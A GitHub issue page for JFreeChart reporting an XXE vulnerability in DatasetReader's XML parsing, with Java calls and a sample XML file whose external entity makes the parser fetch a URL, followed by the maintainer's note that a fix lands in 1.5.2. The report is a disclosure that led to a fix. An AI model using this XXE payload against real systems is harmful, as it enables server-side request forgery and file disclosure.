Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

XML Parse Bug #130

Closed
kingkaki opened this issue Sep 5, 2019 · 1 comment
Closed

XML Parse Bug #130

kingkaki opened this issue Sep 5, 2019 · 1 comment

Comments

@kingkaki
Copy link

kingkaki commented Sep 5, 2019

You have not set security Feature to cause XXE(XML external entity attack)
code

DatasetReader.readPieDatasetFromXML(new File("1.xml"));
DatasetReader.readCategoryDatasetFromXML(new File("1.xml"));

1.xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE sec [
        <!ENTITY xxe SYSTEM "http://localhost:8000" >]>
<CategoryDataset>&xxe;</CategoryDataset>
hashtagviv pushed a commit to hashtagviv/jfreechart that referenced this issue Dec 11, 2019
patch3 jfree#130 fixed
8621aa3
@jfree
Copy link
Owner

jfree commented Nov 13, 2020

Thanks for the report. I've committed a fix for the upcoming version 1.5.2 release.

@jfree jfree closed this as completed Nov 13, 2020
jfree added a commit that referenced this issue Nov 13, 2020
@jfree
See #130
756c2ac
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@jfree @kingkaki